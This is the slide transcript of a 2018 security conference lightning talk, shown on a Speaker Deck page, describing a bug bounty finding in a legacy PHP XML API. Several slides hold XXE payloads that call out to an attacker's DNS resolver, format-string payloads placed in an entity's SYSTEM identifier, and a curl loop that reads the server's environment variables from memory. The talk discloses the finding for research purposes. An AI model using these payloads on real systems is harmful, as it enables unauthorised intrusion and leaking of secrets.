Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web based format injection, dumping memory like...

Frans Rosén
September 19, 2018
Research
0
72

Web based format injection, dumping memory like it's 99 (or "Please help")

My lightning talk from Sec-T Stockholm in September 2018.

Frans Rosén

September 19, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
930
Story of a RCE on Apple through hot jar swapping
fransrosen
0
990
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
170
A methodology using fuzzing and info disclosure
fransrosen
0
230
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.8k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
8k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.8k

Other Decks in Research

See All in Research
Practical The One Person Framework
asonas
1
1.8k
Zipf 白色化:タイプとトークンの区別がもたらす良質な埋め込み空間と損失関数
eumesy
PRO
8
1k
[2024.08.30] Gemma-Ko, 오픈 언어모델에 한국어 입히기 @ 머신러닝부트캠프2024
beomi
0
800
ミニ四駆AI用制御装置の事例紹介
aks3g
0
180
研究の進め方 ランダムネスとの付き合い方について
joisino
PRO
56
20k
メタヒューリスティクスに基づく汎用線形整数計画ソルバーの開発
snowberryfield
3
620
ソフトウェア研究における脅威モデリング
laysakura
0
930
論文読み会 KDD2024 | Relevance meets Diversity: A User-Centric Framework for Knowledge Exploration through Recommendations
cocomoff
0
110
Tietovuoto Social Design Agency (SDA) -trollitehtaasta
hponka
0
3k
クロスセクター効果研究会 熊本都市交通リノベーション~「車1割削減、渋滞半減、公共交通2倍」の実現へ~
trafficbrain
0
290
TransformerによるBEV Perception
hf149
1
580
Weekly AI Agents News! 11月号 論文のアーカイブ
masatoto
0
180

Featured

See All Featured
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
17
2.2k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
111
49k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
229
52k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.1k
Code Reviewing Like a Champion
maltzj
520
39k
A Tale of Four Properties
chriscoyier
157
23k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Bash Introduction
62gerente
608
210k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
0
94
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
29
2k

Transcript

  1. @fransrosen Web based format injection, dumping memory like it's 99

    or "Please help"

  2. @fransrosen Public Bug Bounty

  3. @fransrosen RCE is 30,000 USD

  4. @fransrosen Methodology • Found a domain not like the other

    ones

  5. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization

  6. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

  7. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

  8. @fransrosen Methodology • Google + GitHub etc

  9. @fransrosen Methodology • Google + GitHub etc

  10. @fransrosen Methodology • Google + GitHub etc

  11. @fransrosen Methodology • Google + GitHub etc

  12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

  14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

  15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

  17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

  18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  19. @fransrosen xml_api?

  20. @fransrosen xml_api?

  21. @fransrosen xml_api? YEAH! 👍

  22. @fransrosen wtf!?

  23. @fransrosen XXE!

  24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

  33. @fransrosen

  34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

  39. @fransrosen Format String Injection?

  40. @fransrosen Format String Injection ON ZE WEB?

  41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  44. @fransrosen I can’t handle this shit

  45. @fransrosen Help me, zetatwo

  46. @fransrosen Help me, zetatwo

  47. @fransrosen Help me, zetatwo

  48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  50. @fransrosen Limitations 0x20-0xFF (no 0x22)

  51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  60. @fransrosen Want to collaborate? @fransrosen

  61. @fransrosen Questions? Suggestions?